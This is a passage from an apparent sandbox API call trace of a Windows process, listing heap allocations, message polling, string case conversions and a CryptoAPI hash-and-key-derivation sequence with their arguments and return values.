Flags=0x0, Size=0x10) returned 0x34aa568 [0165.577] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0165.578] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.578] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.578] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.578] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.578] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0165.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.578] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0165.579] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.579] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.579] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0165.579] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0165.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.580] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.580] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.580] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.581] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0165.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.582] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0165.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0165.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.582] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.583] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.583] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.584] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.584] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.585] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.585] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.585] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.585] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.585] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0165.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0165.586] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.586] CryptHashData (hHash=0xaa56a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0165.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0165.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0165.587] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.587] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.587] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0165.588] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0165.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.588] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.588] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0165.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.589] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa56a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5660) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.589] 